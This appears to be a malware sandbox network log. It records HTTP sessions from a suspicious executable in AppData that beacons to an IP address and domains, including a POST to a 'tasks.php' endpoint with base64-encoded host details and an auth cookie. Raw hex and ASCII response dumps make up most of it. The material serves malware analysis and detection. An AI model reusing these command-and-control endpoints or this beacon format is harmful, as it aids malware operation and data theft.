                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131222963 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE4Ni43ODkxOjE5MWJiOTk1MDNhNzllMTAyOTU5MmZiNDY3NmVjNjg1ZTk4NzhkMDVhN2YzOTU0MTA0MTk2NTk2N2E3MGE0ZTk6Njc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131232023 CEST1236INData Raw: 78 4d 6a 4e 69 59 6d 46 6a 4d 47 45 32 4e 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                                                                          Data Ascii: xMjNiYmFjMGE2Ng==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131335020 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 62 62 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123bbb&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '7c57f1d970952c2b5dfebe45757a591781462dd4a0e');</script><script type='


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          31192.168.2.949842190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.398519039 CEST171OUTGET /sobakavolos.gif?140deb53=-1939771579 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          32192.168.2.949861185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.935051918 CEST156OUTGET /sobaka1.gif?1495f698=690744624 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995506048 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:12 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_AScvsugINVI061Jl9qEAQC52h8opQq+tj9GFiE+5k81eQaQ82r7QsN18fpV5YaRtidkmVLh1qq98EM30sSHXNQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995536089 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE5Mi42MzU3OmY5OGYxNjExYTRlMTA2ZDdiMGMyYjIyNzE2OWMxNDUyNmU4ODg2OGZjYzE5OTcyMzEzYWYxNDIxZGQ4YWJjMGU6NjcxMjNiYzA5YjMyNg==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995548964 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995587111 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 32 30 38 34 32 64 32 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 14620842d2');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          33192.168.2.949867194.5.152.215807352C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.696280003 CEST453OUTPOST /n/tasks.php HTTP/1.0
                                                                                                                                                                                                                                                                                          Host: n.ddnsgratis.com.br
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
                                                                                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                          Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
                                                                                                                                                                                                                                                                                          Content-length: 192
                                                                                                                                                                                                                                                                                          Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.796395063 CEST606INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:13 GMT
                                                                                                                                                                                                                                                                                          Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
                                                                                                                                                                                                                                                                                          X-Powered-By: PHP/5.6.14
                                                                                                                                                                                                                                                                                          Status: 404 Not Found
                                                                                                                                                                                                                                                                                          Content-Length: 377
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf8
                                                                                                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 [TRUNCATED]
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          34192.168.2.949870190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:13.535052061 CEST170OUTGET /sobakavolos.gif?14b59e3b=1737234215 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          35192.168.2.949889185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.817353964 CEST156OUTGET /sobaka1.gif?1543ef95=713547562 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.906209946 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:19 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ufXfoUdp3WxsGAxMbGw9b896SYqSv9ARdvAfmXJYbERAv5WSAOEjUu6nR1shCU/oKjRTxm33BxZd3vpahr9CoQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.906275988 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE5OS41MzI0OjQ0OTcwNWJlOTdhZDYxOGIyM2YzNDc1N2I3MGNjMmZjYjA4YmM1YThkZDgxNGM2ZGFhZTUyN2JhNTN6eehZjg2YTY6NjcxMjNiYzc4MWY
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.906290054 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          36192.168.2.949899190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.929708004 CEST170OUTGET /sobakavolos.gif?15aba7b5=-659256046 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          37192.168.2.949918185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:24.627928972 CEST157OUTGET /sobaka1.gif?16b31880=-867443584 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:25.649245977 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:43:25 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_DY9Bxe9I4m2z6CYnWRuosCOfH7OTCfbUl+gMaMc9pr6m6mFTq53CVshB6OYbkAvf3TXxyGW6Yi5J3c/jbcNsJg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
